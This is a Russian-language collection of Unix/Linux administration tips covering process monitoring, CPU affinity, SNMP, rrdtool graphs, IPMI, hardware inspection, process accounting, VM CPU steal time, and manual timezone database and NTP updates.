Должно работать на любом терминале поддерживающем VT Escape последовательности, проверено в Linux, True64 , HP-UX и Соларисе . #!/bin/ksh SLEEP=$1 FIELD=$2 [ -z "$1" ] && SLEEP=10 [ -z "$2" ] && FIELD=1 stty_save=`stty -g` trap "stty $stty_save ; exit; " 2 stty sane clear lines=`tput lines` lines=$((lines-5)) DATE=`date '+%H:%M:%S'` echo "\t\t`tput rev``hostname` TOP $lines PROCESESS at $DATE every $SLEEP seconds`tput sgr0`" tput bold case `uname` in Linux) PS_COMMAND="ps -e -o pcpu= -o cputime= -o user= -o uid= -o pid= -o pmem= -o rssize= -o comm=" HEADER_COMMAND="ps f -p $$ -o pcpu,cputime,user,uid,pid,pmem,rssize,command" ;; HP-UX) UNIX95=1 export UNIX95 PS_COMMAND="ps -e -o pcpu= -o time= -o user= -o uid= -o pid= -o vsz= -o sz= -o comm=" HEADER_COMMAND="ps -p $$ -o pcpu,time,user,uid,pid,vsz,sz,comm" ;; SunOS) HEADER_COMMAND="ps -f -p $$ -o pcpu,time,user,uid,pid,pmem,rss,comm" PS_COMMAND="ps -e -o pcpu= -o time= -o user= -o uid= -o pid= -o pmem= -o rss= -o comm=" ;; *) PS_COMMAND="ps -ef -o pcpu=,cputime=,user=,uid=,pid=,pmem=,rssize=,comm=" HEADER_COMMAND="ps -f -p $$ -o pcpu,cputime,user,uid,pid,pmem,rssize,command" ;; esac $HEADER_COMMAND | head -1 tput sgr0 while [ true ] ; do tput cup 2 0 tput ed $PS_COMMAND | sort -r -n -k"$FIELD" | head -$lines sleep $SLEEP done

Привязка процесса к определенному CPU в SMP системе под Linux (доп. ссылка 1) Автор: nixcraft [комментарии]

Пример использования жесткой привязки процесса к определенному процессору (CPU affinity). Устанавливаем пакет schedutils (Debian: apt-get install schedutils, Red Hat: up2date schedutils или rpm -ivh schedutils*) Привязка процесса с pid 13545 к первому CPU (#0): taskset -c 1 -p 13545 к 3 и 4 CPU (#2 и #3): taskset -c 3,4 -p 13545 Загрузку процессоров в SMP системе удобно оценивать через утилиту mpstat из пакета sysstat. mpstat -P ALL Утилизацию подсистемы ввода/вывода можно посмотреть через команду iostat

Как более детально посмотреть сколько программа потребляет памяти [комментарии]

Linux: pmap <pid_процесса> cat /proc/<pid>/maps cat /proc/<pid>/status FreeBSD: cat /proc/<pid>/map cat /proc/<pid>/status

Как получить данные с роутера по SNMP, зная его IP и communitystring Автор: cyrex [комментарии]

% snmpwalk -c communitystring -v 1 10.0.0.254 Ключ -c указывает строку community (обычно public) -v задаёт версию протокола (1) Если хотите просмотреть только часть дерева то можно задать вот так: % snmpwalk -c community -v 1 -m iso.3.6.1.2.1.6.13.1.2 10.0.0.254

Построение графиков из rrdtool. Подсчёт суммарного трафика Автор: cyrex [комментарии]

Пусть имеется созданная rrd база в файле /path/to/file.rrd (man rrdcreate), в которой содержатся 2 столбца данных ifinoctets и ifoutoctets (число входящих и исходящих пакетов на интерфейсе за минуту). Как обновлять man rrdupdate. Задача: требуется отобразить это графически с подписью данных, а так же суммарным трафиком и средней загрузкой канала. Создаётся график следующим образом: #!/bin/sh /usr/local/bin/rrdtool graph /tmp/picture.png --end now --start -1d \ --width 500 --height 600 --imgformat PNG \ --title "title" --rigid --color BACK#FAFAFA \ DEF:ifino=/path/to/file.rrd:ifinoctets:AVERAGE \ DEF:ifouto=/path/to/file.rrd:ifoutoctets:AVERAGE \ CDEF:ifino1=ifino,60,/ \ CDEF:ifouto1=ifouto,60,/ \ VDEF:sumin=ifino1,TOTAL \ VDEF:sumout=ifouto1,TOTAL \ VDEF:maxin=ifino1,MAXIMUM \ VDEF:maxout=ifouto1,MAXIMUM \ VDEF:avgin=ifino1,AVERAGE \ VDEF:avgout=ifouto1,AVERAGE \ AREA:ifino1#00FF00:"In" \ GPRINT:maxin:"Max=%lf%s" \ GPRINT:avgin:"Avg=%lf%s" \ GPRINT:sumin:"Sum=%lf%sl" \ LINE1:ifouto1#0000FF:"Out" \ GPRINT:maxout:"Max=%lf%s" \ GPRINT:avgout:"Avg=%lf%s" \ GPRINT:sumout:"Sum=%lf%s\l" Результатом работы данного скрипта будет создание графика входящих и сходящих пакетов на интерейсе(в байт/сек), а так же будут отражены на графике средняя загрузка, пиковые значения и суммарный трафик через интрефейс. подробнее об параметрах в man rrdgraph,man rrdgraph_rpn,man rrdgraph_graph

Диагностика состояния сервера при помощи IPMI и пакета freeipmi (доп. ссылка 1) [обсудить]

Общая информация о BMC и поддержке IPMI: # bmc-info Состояние сенсоров (температура, вольтаж, проблемы): # sensors Более детально: # sensors -vv Состояние лога событий (почему сервер начал пищать): # sel Чистка лога событий (чтобы не пищал): # sel -c Вместо freeipmi можно использовать ipmitools. Вывод поддерживаемых сервером возможностей IPMI: ipmitool -v chassis status Информация с сенсоров: ipmitool sensor Статус сенсоров: ipmitool sdr list all Вывод FRU: ipmitool fru

Как не разбирая корпус посмотреть модель материнской платы (доп. ссылка 1) Автор: Anton V. Yuzhaninov [комментарии]

1. Просмотреть содержимое BIOS (проверял под Linux и FreeBSD) dd if=/dev/mem bs=64k skip=15 count=1 | strings | less в первых строчках обычно упоминается название материнской платы. 2. Воспользоваться утилитой dmidecode

Просмотр информации оборудовании через /proc в Linux (доп. ссылка 1) [комментарии]

cat /proc/cpuinfo cat /proc/meminfo cat /proc/ide/via cat /proc/ide/ide0/hda/geometry cat /proc/ide/drivers cat /proc/sys/dev/cdrom/info cat /proc/scsi/scsi

Как посмотреть параметры видеокарты (доп. ссылка 1) [комментарии]

xdpyinfo glxinfo xvinfo

Как оценить величину трафика и состояние системы в динамике для FreeBSD [комментарии]

Динамика изменения параметров: netstat -w 1 iostat -w 1 vmstat -w 1 gstat Состояние буферов: vmstat -z netstat -m netstat -Lan netstat -s -p tcp

Какую расширенную информацию о процессе можно получить. [комментарии]

Определяем родителя: ps -lp <pid> (в Linux есть утилита ptree) Определяем какие файлы открыты: fstat -p <pid> (freebsd) lsof -p <pid> Определяем какие сетевые сокеты сопоставлены с процессом: sockstat| grep <pid> (freebsd) netstat -pan| grep <pid> (linux) lsof -i -n|grep <pid>

Как отследить запущенные пользователями программы (доп. ссылка 1) Автор: uldus [обсудить]

Включение контроля выполняемых процессов в FreeBSD: rc.conf accounting_enable="YES" periodic.conf daily_accounting_enable="YES" # Rotate acct files daily_accounting_compress="NO" # Gzip rotated files daily_accounting_flags=-q # Flags to /usr/sbin/sa daily_accounting_save=3 # How many files to save monthly_accounting_enable="YES" # Login accounting В Linux (пакет acct или psacct): service acct start или руками /sbin/accton /var/log/pacct Просмотр статистики через команды sa, lastcomm, last-acct, dump-acct, ac (ac -p, sa -u, sa -m, sa -f). Например: Загрузка системы пользователями ac -p|awk '{print $2 "\t" $1}'|sort -r -n /usr/sbin/sa -m| perl -n -e 's/[\t ]+/\t/g;print $_;' Топ загрузки системы скриптами пользователей /usr/sbin/sa -u|awk '{print $8 "\t\t(" $1 ")"}'|sort| uniq -c|sort -n -r Загрузка системы всеми программами /usr/sbin/sa -f

Как посмотреть список установленных локов в системе. [обсудить]

Используйте утилиту lslk

Что обозначают буквы в поле STAT при запуске ps -aux или top ? [комментарии]

R - Процесс выполняется в данный момент S - Процесс ожидает выполнение (спит) D - Процесс в полной (непрерываемой) спячке, например, ожидает ввода/вывода Z - zombie или defunct процесс, т.е. процесс у которого нет родителя. T - Процесс остановлен. W - процесс в свопе < - процесс в приоритетном режиме. N - процесс в режиме низкого приоритета L - real-time процесс, имеются страницы заблокированные в памяти.

Как в FreeBSD посмотреть состояние системных буферов [обсудить]

sysctl vm.zone

Как в FreeBSD узнать значения LoadAverage, объем свободного ОЗУ и т.д. [комментарии]

sysctl vm.stats.vm.v_active_count sysctl vm.stats.vm.v_inactive_count sysctl vm.stats.vm.v_wire_count sysctl vm.stats.vm.v_cache_count sysctl vm.stats.vm.v_free_count sysctl vm.stats.vm.v_page_count более подробно: sysctl -a|grep vm sysctl| less

Как узнать аппаратную конфигурацию (ОЗУ, CPU и т.д.) машины под FreeBSD [комментарии]

sysctl -a | grep hw

Как в FreeBSD более подробно ознакомится с поддержкой аппаратного устройства [обсудить]

man 4 имя_устройства. примеры: man 4 fxp; man 4 rl; man 4 ed; man 4 amr; man 4 pcm; man 4 cd; man 4 tty; man 4 sio;

Команды для аккаутинга [обсудить]

Сколько CPU времени использовал каждый юзер в системе ac -p Какие команды запускал каждый пользователь и сколько CPU и памяти было использовано при их выполнении: sa -u

Как получить список всех PCI и USB устройств на машине [комментарии]

lspci lspci -vvv lsusb lsusb -vvv scanpci lshw lspcidrake

Замечание по утилите lsof [обсудить]

Ключи: -U - unix socket -i inet формат: tcp_или_udp@host:port, например: tcp:25, @192.168.1.1 Примеры: Список всех открытых файлов: lsof Все процессы использующие файл: lsof file Какие процессы используют internet и unix domain сокеты: lsof -i -U Все открытые файлы для юзера: lsof -l user ...для процесса 12: lsof -p 12

Как посмотреть какие файлы открыты заданным процессом [обсудить]

ls /proc/ID_процесса/fd lsof -p ID_процесса

Как посмотреть какие процессы используют заданный файл [обсудить]

fuser file

Как посмотреть какой сокет заняла какая программа [комментарии]

для всех: lsof -i -U fuser <port_num>/tcp для linux: netstat -pvlA inet для FreeBSD: sockstat

Откуда берется steal внутри виртуальных машин и что с этим делать (доп. ссылка 1) Автор: Mail.Ru Cloud Solutions [комментарии]

CPU steal time - это время, в течение которого виртуальная машина не получает ресурсы процессора для своего выполнения. Это время считается только в гостевых операционных системах в средах виртуализации. Что такое steal Steal - это метрика, указывающая на нехватку процессорного времени для процессов внутри виртуальной машины. Как описано в патче ядра KVM, steal - это время, в течение которого гипервизор выполняет другие процессы на хостовой операционной системе, хотя он поставил процесс виртуальной машины в очередь на выполнение. То есть steal считается как разница между временем, когда процесс готов выполниться, и временем, когда процессу выделено процессорное время. Метрику steal ядро виртуальной машины получает от гипервизора. При этом гипервизор не уточняет, какие именно другие процессы он выполняет, просто "пока занят, тебе времени уделить не могу". На KVM поддержка подсчёта steal добавлена в патчах. Ключевых моментов здесь два: 1. Виртуальная машина узнает о steal от гипервизора. То есть, с точки зрения потерь, для процессов на самой виртуалке это непрямое измерение, которое может быть подвержено различным искажениям. 2. Гипервизор не делится с виртуалкой информацией о том, чем он занят - главное, что он не уделяет время ей. Из-за этого сама виртуалка не может выявить искажения в показателе steal, которые можно было бы оценить по характеру конкурирующих процессов. Как вычислить steal По сути, steal считается как обычное время утилизации процессора. В ядре добавляется ещё один счетчик непосредственно для процесса KVM (процесса виртуальной машины), который считает длительность пребывания процесса KVM в состоянии ожидания процессорного времени. Счетчик берет информацию о процессоре из его спецификации и смотрит, все ли его тики утилизированы процессом виртуалки. Если все, то считаем, что процессор занимался только процессом виртуальной машины. В ином случае информируем, что процессор занимался чем-то еще, появился steal. Подробнее читайте в статье Brendann Gregg. Как мониторить steal Мониторить steal внутри виртуальной машины можно как любую другую процессорную метрику. Главное, чтобы виртуалка была на Linux. Windows такую информацию не предоставляет. Сложность возникает при попытке получить эту информацию с гипервизора. Можно попробовать спрогнозировать steal на хостовой машине, например, по параметру Load Average (LA) - усредненного значения количества процессов, ожидающих в очереди на выполнение. Методика подсчета этого параметра непростая, но в целом пронормированный по количеству потоков процессора LA > 1 указывает на перегрузку Linux-сервера. Чего же ждут все эти процессы? Очевидный ответ - процессора. Но иногда процессор свободен, а LA зашкаливает. На самом деле, процессы могут ожидать окончания любой блокировки, как физической, связанной с устройством ввода/вывода, так и логической, например мьютекса. Туда же относятся блокировки на уровне железа (того же ответа от диска) или логики (так называемых блокировочных примитивов). Ещё одна особенность LA в том, что оно считается как среднее значение по ОС, причём не меньше, чем за минуту. Например, 100 процессов конкурируют за один файл, тогда LA=50. Такое большое значение, казалось бы, говорит, что ОС плохо. Но для криво написанного кода это может быть нормой - плохо только ему, а другие процессы не страдают. Из-за этого усреднения (причём не меньше, чем за минуту), определение чего-либо по LA может закончиться весьма неопределенными результатами в конкретных случаях. Почему появляется steal и что делать Остановимся на основных причинах появления steal, с которыми мы столкнулись при работе с облачной платформой MCS, и способах борьбы с ними. Переутилизация. Самое простое и частое - много запущенных виртуальных машин, большое потребление процессора внутри них, большая конкуренция, утилизация по LA больше 1 (в нормировке по процессорным тредам). Внутри всех виртуалок всё тормозит. Steal, передаваемый с гипервизора, также растёт, надо перераспределять нагрузку или кого-то выключать. При этом нужно учитывать, что соотношение нагрузки на гипервизоре и steal внутри виртуальной машины не всегда однозначно взаимосвязаны. Обе оценки steal могут быть ошибочными в конкретных ситуациях при разных нагрузках. Паравиртуализация против одиноких инстансов. На гипервизоре одна единственная виртуалка, она потребляет небольшую его часть, но дает большую нагрузку по вводу/выводу, например по диску. И откуда-то в ней появляется небольшой steal, до 10%. Тут дело как раз в блокировках на уровне паравиртуализированных драйверов. Внутри виртуалки создается прерывание, оно обрабатывается драйвером и уходит в гипервизор. Из-за обработки прерывания на гипервизоре для виртуалки это выглядит как отправленный запрос, она готова к исполнению и ждёт процессора, но процессорного времени ей не дают. Виртуалка думает, что это время украдено. Это происходит в момент отправки буфера, он уходит в kernel space гипервизора, и мы начинаем его ждать. Хотя, с точки зрения виртуалки, он должен сразу вернуться. Следовательно, по алгоритму расчета steal это время считается украденным. Скорее всего, в этой ситуации могут быть и другие механизмы (например, обработка ещё каких-нибудь sys calls), но они не должны сильно отличаться. Небольшой steal можно считать нормой (даже и без паравиртуализации, с учётом нагрузки внутри виртуалки, особенностей нагрузки соседей, распределения нагрузки по тредам и прочего). Однако важно обращать внимание на то, как себя чувствуют приложения внутри виртуалок. Шедулер против высоконагруженных виртуалок. Когда одна виртуалка страдает от steal больше других, это связано с шедулером (распределением ресурсов между процессами) - чем сильнее процесс нагружает процессор, тем скорее шедулер его выгонит, чтобы остальные тоже могли поработать. Если виртуалка потребляет немного, она почти не увидит steal: её процесс честно сидел и ждал, ему дадут время. Если виртуалка дает максимальную нагрузку по всем своим ядрам, её чаще выгоняют с процессора и не дают много времени. Шедулер плохо относится к процессам, которые много просят. Большие виртуалки - зло. Низкий LA, но есть steal. LA примерно 0,7 (то есть, гипервизор, кажется недозагружен), но внутри отдельных виртуалок наблюдается steal: 1. Уже описанный выше вариант с паравиртуализацией. Виртуалка может получать метрики, указывающие на steal, хотя у гипервизора всё хорошо. По результатам наших экспериментов, такой вариант steal не превышает 10 % и не должен оказывать существенного влияния на производительность приложений внутри виртуалки. 2. Неверно считается LA. Точнее, в каждый конкретный момент он считается верно, но при усреднении получается заниженным. Например, если одна виртуалка на треть гипервизора потребляет все свои процессоры ровно полминуты, LA за минуту на гипервизоре будет 0,15; четыре такие виртуалки, работающие одновременно, дадут 0,6. А то, что полминуты на каждой из них был steal под 25 % по LA, уже не вытащить. 3. Из-за шедулера, решившего, что кто-то слишком много ест, и пусть он подождет, пока я займусь другими важными системными вещами. В итоге одни виртуалки не видят никаких проблем, а другие испытывают серьезную деградацию производительности. Другие искажения Есть другие причины для искажений честной отдачи процессорного времени на виртуалке. Например, сложности в расчёты вносят гипертрединг и NUMA. Они запутывают выбор ядра для исполнения процесса, потому что шедулер использует коэффициенты - веса, которые при переключении контекста выполняют усложнённый подсчёт. Бывают искажения из-за технологий типа турбобуста или, наоборот, режима энергосбережения, которые при подсчёте утилизации могут искусственно повышать или понижать частоту или даже квант времени на сервере. Включение турбобуста уменьшает производительность одного процессорного треда из-за увеличения производительности другого. В этот момент информация об актуальной частоте процессора виртуальной машине не передается, и она считает, что её время кто-то тырит (например, она запрашивала 2 ГГц, а получила вдвое меньше). В общем, причин искажений может быть много. Чтобы выяснить steal в конкретной системе, исследуйте различные варианты, собирайте метрики, тщательно их анализируйте и продумывайте, как равномерно распределять нагрузку. От любых кейсов возможны отклонения, которые надо подтверждать экспериментально или смотреть в отладчике ядра. Начать лучше с книг, на которые я дал линки выше, и съёма статистики с гипервизора утилитами типа perf, sysdig, systemtap, коих десятки.

Установка и синхронизация времени

Решение проблемы со шрифтами в Steam после выставления времени после 2038 года (доп. ссылка 1) [комментарии]

Некоторые игры позволяют получать достижения если не запускать игру несколько лет, например, The Stanley Parable содержит достижение, активируемое после 5 лет неактивности, а Ultra Deluxe - после 10. Для получения указанных бонусов обычно переводят часы на необходимое время вперёд, запускают игру для фиксации достижения и возвращают время назад. Проблема в том, что если время изменено на момент после 2038 года, подобная манипуляция приводит к смене в интерфейсе Steam шрифта, и выставленный шрифт может оказаться экзотическим, что мешает восприятию информации. Указанный эффект связан с отсутствием в некоторых приложениях, и в частности в fontconfig, поддержки корректной работы после 2038 года из-за переполнения 32-разрядного типа данных time_t. Наличие проблемы выражается в выводе сообщения об ошибке "Value too large for defined data type" при запуске fontconfig в случае наличия файлов с датой доступа после 2038 года. $ stat /etc/fonts/conf.d/*|grep 2040 Access: 2040-11-22 00:00:04.110328309 +0100 Access: 2040-11-22 00:00:04.110328309 +0100 Access: 2040-11-22 00:00:04.110328309 +0100 ... Для решения проблемы следует поменять ушедшее в будущее время доступа на текущее: sudo mount -o remount,strictatime / sudo mount -o remount,strictatime /home sudo find / -newerat 2038-01-19 -exec touch -a {} + sudo mount -o remount,relatime / sudo mount -o remount,relatime /home Перемонтирование с опцией "strictatime" необходимо так как по умолчанию при монтировании используется опция "relatime" при которой время доступа меняется только если обращение произведено позднее уже выставленного для файла времени доступа.

Настройка перехода на зимнее время для устаревших систем [комментарии]

В ночь с 25 на 26 октября в РФ будет осуществлён переход на постоянное зимнее время. Астрономический полдень сдвинется с 14 до 13 часов, темнеть в декабре будет в 4 часа дня, а светать в 9 утра, в июле темнеть будет в 10 вечера, а светать в 3 ночи. Для "сов" наступает настоящий кошмар :-) Для систем, время поддержки которых не истекло параметры перевода часов уже поступили с очередным обновлением. Для устаревших систем придётся обновлять данные часовых поясов вручную. Обновления содержимого базы данных часовых поясов можно получить с сайта ftp://ftp.iana.org/tz/releases/ Для ручного обновления базы часовых поясов загружаем свежую версию архива tzdata: mkdir tz cd tz wget ftp://ftp.iana.org/tz/releases/tzdata2014i.tar.gz Распаковываем: tar xzf tzdata2014i.tar.gz Смотрим . запланированы ли правила перевода часов: zdump -v Asia/Yekaterinburg |grep 2014 Если команда ничего не выдала, значит в системе установлена старая база часовых поясов и её нужно обновить. Ищем нужный город в файлах asia или europe, географически положение может не совпадать, например, Екатеринбург находится в Азии, но указан в файле europe. Компилируем часовые пояса из файла europe. Утилита zic читает текстовый файл с описаниями зон и на выходе формирует бинарные файлы специального формата и сохраняет их в директорию /usr/share/zoneinfo (изменить директорию можно флагом "-d"): zic europe Скомпилированные файлы параметров часовых поясов будут сохранены в файле /usr/share/zoneinfo/Asia/Yekaterinburg, который нужно скопировать в файл /etc/localtime, определяющий текущий часовой пояс: cp /etc/localtime /etc/localtime.old cp -f /usr/share/zoneinfo/Asia/Yekaterinburg /etc/localtime После обновления в выводе zdump должно появиться правило перевода часов: zdump -v Asia/Yekaterinburg |grep 2014 Asia/Yekaterinburg Sat Oct 25 19:59:59 2014 UTC = Sun Oct 26 01:59:59 2014 YEKT isdst=0 gmtoff=21600 Asia/Yekaterinburg Sat Oct 25 20:00:00 2014 UTC = Sun Oct 26 01:00:00 2014 YEKT isdst=0 gmtoff=18000 При использовании PostgreSQL требуется не забыть обновить внутреннюю базу часовых поясов данной СУБД, которая расположена в директории /usr/local/pgsql/share/timezone (меняем /usr/local/pgsql/share/timezone/Asia/Yekaterinburg и перезапускаем PostgreSQL). В PHP может использоваться собственная база часовых поясов, в этом случае требуется обновить пакет http://pecl.php.net/package/timezonedb Дополнительно стоит обратить внимание на логику вычисления отрезков времени в биллинговых системах и прочих службах. С 2011 года, когда был отменён переход на зимнее/летнее время, успели появиться приложения, не учитывающие сдвиг на час, что чревато списанием/начислением лишнего часа и прочими неприятными эффектами, проявляющимися при запуске программ в "исчезнувший" час.

Ручная настройка отмены перехода на зимнее время в Unix-подобных ОС (доп. ссылка 1) Автор: Величко Д.С. [комментарии]

В России, Украине и Беларуси отменен переход на зимнее время. В отличие от прошлых лет, с 29 на 30 октября часы переводить не нужно. Для большинства систем новая база часовых поясов будет установлена через штатные обновления и не потребует от пользователя каких-либо действий. Для устаревших систем потребуется внесение ручных изменений. Текущий часовой пояс в Linux и FreeBSD устанавливается файлом /etc/localtime. Этот файл представляет собой ссылку на информационный файл зоны или его копию. В большинстве дистрибутивов база данных с информацией о часовых поясах расположена в каталоге /usr/share/zoneinfo. Обновления содержимого базы данных часовых поясов можно получить с сайта ftp://elsie.nci.nih.gov/pub/ Для ручного обновления базы часовых поясов загружаем её последнюю версию: wget ftp://munnari.oz.au/pub/tzdata2011n.tar.gz Распаковываем во временную директорию: tar xzf tzdata2011n.tar.gz Проверяем текущую установленную зону для Fedora/RHEL/CentOS: cat /etc/sysconfig/clock | grep ZONE ZONE="Asia/Yekaterinburg" для Debian/Ubuntu: cat /etc/timezone Asia/Yekaterinburg Проверим активное расписание переходов на зимнее/летнее время для текущей зоны: zdump -v Asia/Yekaterinburg |grep 2011 Asia/Yekaterinburg Sat Mar 26 20:59:59 2011 UTC = Sun Mar 27 01:59:59 2011 YEKT isdst=0 gmtoff=18000 Asia/Yekaterinburg Sat Mar 26 21:00:00 2011 UTC = Sun Mar 27 03:00:00 2011 YEKT isdst=0 gmtoff=21600 Asia/Yekaterinburg Sat Oct 29 20:59:59 2011 UTC = Sun Oct 30 02:59:59 2011 YEKST isdst=1 gmtoff=21600 Asia/Yekaterinburg Sat Oct 29 21:00:00 2011 UTC = Sun Oct 30 02:00:00 2011 YEKT isdst=0 gmtoff=18000 Если последних двух строк нет, значит в систем уже установлена обновленная база временных зон и больше ничего делать не нужно. Иначе, убедимся в наличии необходимого обновления. Для городов в европейской части смотрим файл europe, для азии - asia. Разделение в этих файлах весьма условное, например, Екатеринбург относится к группе Asia, но указан в файле europe: vi europe ищем город для своего часового пояса: Zone Asia/Yekaterinburg 4:02:24 - LMT 1919 Jul 15 4:00 4:00 - SVET 1930 Jun 21 # Sverdlovsk Time 5:00 Russia SVE%sT 1991 Mar 31 2:00s 4:00 Russia SVE%sT 1992 Jan 19 2:00s 5:00 Russia YEK%sT 2011 Mar 27 2:00s 6:00 - YEKT # Yekaterinburg Time На всякий случай делаем резервную копию файла с текущими настройками: cp /etc/localtime /tmp/localtime.old Компилируем временные зоны из файла europe. Утилита zic читает текстовый файл с описаниями зон и на выходе формирует бинарные файлы специального формата. Стоит обратить внимание что утилита без ключа "-d" пишет файлы временных зон сразу в /usr/share/zoneinfo, что нам и необходимо. zic europe Создаем ссылку на обновленную временную зону: ln -sf /usr/share/zoneinfo/Asia/Yekaterinburg /etc/localtime После обновления проверим переходы времени для нашей текущей зоны. В последний раз переход произошел с 26 на 27 марта: zdump -v Asia/Yekaterinburg |grep 2011 Asia/Yekaterinburg Sat Mar 26 20:59:59 2011 UTC = Sun Mar 27 01:59:59 2011 YEKT isdst=0 gmtoff=18000 Asia/Yekaterinburg Sat Mar 26 21:00:00 2011 UTC = Sun Mar 27 03:00:00 2011 YEKT isdst=0 gmtoff=21600 Убедимся, что 30 октября 2011 года показания будут без перехода на зимнее время: date --date='1000hours' Сбт Ноя 12 14:36:46 YEKT 2011

Как установить точное время на системных часах. [комментарии]

Для unix: в раз в час запускать через крон: ntpdate 194.186.254.22 195.2.64.5 Для Cisco IOS: ntp clock-period 17180070 ntp server 195.2.64.5 version 2 ntp server 194.186.254.22 version 2

Как изменить время в энергонезависимых системных часах (RTC) [комментарии]

Скопировать в аппаратные часы текущее системное время под Linux можно командой: hwclock --systohc В FreeBSD достаточно изменить время используя команду date.

Версия для печати

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру